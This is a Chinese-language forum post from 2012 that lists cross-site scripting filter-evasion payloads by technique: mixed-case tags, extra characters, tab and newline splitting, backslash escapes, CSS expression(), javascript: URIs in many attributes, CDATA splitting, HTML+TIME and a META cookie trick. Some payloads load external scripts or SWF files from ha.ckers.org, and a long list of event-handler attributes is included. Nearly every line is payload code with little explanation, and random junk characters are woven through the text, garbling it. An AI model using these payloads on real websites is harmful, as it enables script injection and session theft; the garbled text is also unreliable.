1. 改变字符大小写/ s3 h2 K, l5 |
; s; t6 g; }- e+ ]" e
7 H! Z' a( U2 b3 m B
8 Y" S q# y( Q* @+ P3 K8 I) D) C <sCript>alert(‘d’)</scRipT>7 [2 a5 {/ h- [: q
+ d4 b+ y! L7 `: G' }) X
2. 利用多加一些其它字符来规避Regular Expression的检查( d- s- T7 a# J' m
& m4 Z5 k8 j: l/ V, F0 H$ g <<script>alert(‘c’)//<</script>! | B, |6 J9 d2 t4 n; _7 |& ?; M
: W9 K9 Z: |7 [1 R i7 @
<SCRIPT a=">" SRC="t.js"></SCRIPT>
/ h0 T, Y& D" x& l
* |4 @3 d- I; E: W8 h; \9 H <SCRIPT =">" SRC="t.js"></SCRIPT>* H1 k6 p% I) Z4 ~+ n9 f& \- P
, G! |+ U u4 a; @& k+ A7 U <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
p' O4 z% y$ n V6 ~; }# |6 ]' L* ?: Z: \
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>, ]. ?9 c9 ?: j5 Q) f$ r% ?$ p! c
7 h' {# W2 H* h: p <SCRIPT a=`>` SRC="t.js"></SCRIPT>
0 N% g: V% q% J9 ^: ^( p
) i6 d# w& L0 d7 O a3 N2 n <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
) Y( y8 z" u# H6 ?; e) q$ s) V, R3 f; N
3. 以其它扩展名取代.js
, d, \8 B2 W5 k$ y: B' o7 k: Y2 Q
9 ]* C, u% i3 h) e, q- S1 q& w <script src="bad.jpg"></script>
+ R2 P/ z& E8 O) k
3 s0 T9 Q' [" Z# ~ r% F/ T4. 将Javascript写在CSS档里
& ]: f; C: ]8 b; T& e
# b1 Q4 T% A- j, ]% }# X+ u <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">5 _" F7 l q% l) q+ r) X0 D" @
( H7 }; [7 P9 Q% Q: ]) e; T example:
: h# x/ L0 @* |% g6 g. }) m
5 F# o" D; A4 S# Y* R. [ body {# I: y, R3 y; [& d9 F$ ]% z
/ O2 M2 `: @+ @1 I0 ^& y2 U background-image: url(‘javascript:alert("XSS");’)
8 i- d: q% p" g; P/ e* N8 t. j! p8 ?% C6 L: \
}
. I K+ F7 D* X& Q2 e/ L. g1 C
1 v! c! @7 a8 L2 r5. 在script的tag里加入一些其它字符$ D# ?2 i7 X W0 \1 d
u+ U8 d8 `% R! j <SCRIPT/SRC="t.js"></SCRIPT>* w0 V' f: F; t( a
9 W4 p1 v/ p) Q8 q( L; b8 j2 v <SCRIPT/anyword SRC="t.js"></SCRIPT>. I, [( W ]# v# {
2 X# z% }0 L7 b6. 使用tab或是new line来规避/ X; m; F D( ^( K: S
2 r3 v6 Z* T+ L$ N8 C, M <img src="jav ascr ipt:alert(‘XSS3′)">/ f& g. I& j5 B/ |
2 ?5 A! C0 @1 @# }. G <img src="jav ascr ipt:alert(‘XSS3′)">
3 X2 b; x% ^5 c/ r4 q* x
: g' a+ M2 a9 [- l* ~+ a _2 u <IMG SRC="jav ascript:alert(‘XSS’);">2 @* c' y: q/ j
* K" t+ j9 ^+ s. d
-> tag' a; i0 R. U/ Z l
9 Y* k% Q6 W. H. K0 v" x- y
-> new line
- P h- a! e1 Q/ Q* U# I B+ }" ~5 X% `3 T4 r
7. 使用"\"来规避6 y9 ~+ J1 G0 {$ I6 {; g
" M6 D9 }' ]2 I. ?% h6 Z; S <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>! z; `' ?2 L/ p6 K0 i! d
9 w" D2 o, J) D
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
( t+ i$ e( s$ e7 U) d
) J! j' X& u' {6 Z# x: q <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
. `# `/ Z$ p: u
. N0 G1 w5 ~$ h! A <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">2 U- a6 B6 P* h! r/ [) f4 o/ F
9 V. P7 t. s. u- r& I6 E3 p
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>5 w& f( C V* ?
/ [) x) ^- K/ M, [
8. 使用Hex encode来规避(也可能会把";"拿掉)
; S8 L9 A' n, ^3 M1 p5 z1 W
6 C1 i) w! D- p$ j3 r" D6 I4 R$ _ <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
( ^6 t z; ]5 Q2 x+ g' h+ \0 V9 u8 s' o1 j4 f# M6 Y6 Y5 _8 m
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">0 p8 n% r- b- w& I. n0 ^
* R& W6 ^5 k h! p* v7 Z! } <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
2 Y, t9 m; K, k$ c* f: t# D: M- v3 I; q6 p1 c7 o! \0 y3 \
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
) o$ S- G- J. L
) Z9 w* V/ n) f: i- t; s9. script in HTML tag8 b0 `' c9 C8 P$ p: X
# Q& ~, @: r* O: ^# q1 i <body onload=」alert(‘onload’)」># X$ e( g S" g
' Q; Q7 ] X. B6 @ E, I4 X X
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
1 C1 h0 D) ~$ R8 d5 |
5 S2 }( N; k2 `" Y2 z F3 F10. 在swf里含有xss的code, i( O9 Q% f& Z1 y, R z
/ I6 |1 K, r# t! N
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>8 S& \$ B1 d, s+ b6 l& U
) @* G- x8 T- T
11. 利用CDATA将xss的code拆开,再组合起来。 Y+ M3 W2 P8 Z
6 y3 z4 G& V0 g0 `. ~* b. w6 [8 }
<XML ID=I><X><C>
$ U" t% K+ ]4 X; W! r4 g1 X# j- K9 g
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>) P$ l8 \' }$ }/ d' v
! r ^$ [9 B( t6 N: n0 K
</C></X>( A1 u" V* B: U9 K) X/ I ^. s) o
: c. R& \" t! K7 F2 h7 V </xml>
/ I! _0 z8 y& p R. U3 `- c' ?0 Z3 O" F
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> u) }1 a" \8 J! Q7 [
0 u( a, `" \/ F; F' n8 f
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>$ B* C& }( g |1 O+ q/ ]
+ a6 z* E* \0 u. g3 K, J
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
# b2 S: X/ H+ S5 Y. h d& Y$ X6 k3 q+ |, }+ D
12. 利用HTML+TIME。7 j2 ]) o3 ^1 x; V; O; g4 c
* b3 D/ V/ H. s r* w; f1 M9 V8 V" w <HTML><BODY>* L3 f q) }% \9 c( n
5 V4 ?3 S* `; N0 x8 p* r
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">$ Z5 l+ L) o1 a9 ~
, k v) o7 H p
<?import namespace="t" implementation="#default#time2">
! c0 I- i% I4 E* N2 h; r/ D' L7 }7 s1 |4 y' h0 o
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
9 v# G* A. ^9 Q$ W: R3 C% i8 r8 j: j3 Y
</BODY></HTML>
/ Q- F3 t, A/ G( `: Z3 P/ X) T; O& z$ a$ r- E$ b
13. 透过META写入Cookie。/ y: E/ k1 W+ d+ X' [- d
! w4 }( G7 r! s, p" o <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">( C8 Q3 H' i0 f7 ^/ X; q
$ Z$ Z3 q$ h v7 W- L4 M* i14. javascript in src , href , url
' S3 T) b3 w: M- N( r+ D# f8 C8 u% I% {! I3 m6 M
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
# d& q9 @9 C+ s% U. f
* |6 v9 {6 H5 P2 G- J) j$ @8 A <img src="javascript:alert(‘XSS3′)"># l0 S6 d8 ]4 U
9 h+ I! X9 h. U3 P
<IMG DYNSRC="javascript:alert(‘XSS20′)">
1 M+ t- G2 j+ j% \ v- W
! s& x+ E m P: P, F <IMG LOWSRC="javascript:alert(‘XSS21′)">- S2 y7 D5 w4 _, S
. W% u/ q/ ]3 i( O4 t <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
7 J! N L0 y* m+ v1 ~7 g& z! n7 E/ M% ~6 t
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>7 m' a3 n+ D' g/ [( D5 ~$ ?7 g
* K/ T6 z9 I- \3 ?( F; l <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
, o6 b9 q1 x2 L0 R- |3 c+ X( t& A9 ~- N9 E8 z) ?
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
& u. f/ S7 u4 R, `9 }$ {
2 w" Y8 V- y" V) ~: e, o# o <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}# Z! P5 z) ~" m" x! ^
( y0 a# F1 g6 k M# J2 N </STYLE><A CLASS=XSS></A>" W- c0 }0 t. L9 n5 o
+ C1 w2 o2 H) |" \, c! l! O5 ^/ v( d <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>, Q' _: p4 U( j1 ]
4 i# o% {8 J' f! a$ M) n |
发表于 2012-12-31 09:59:28
收藏
支持
反对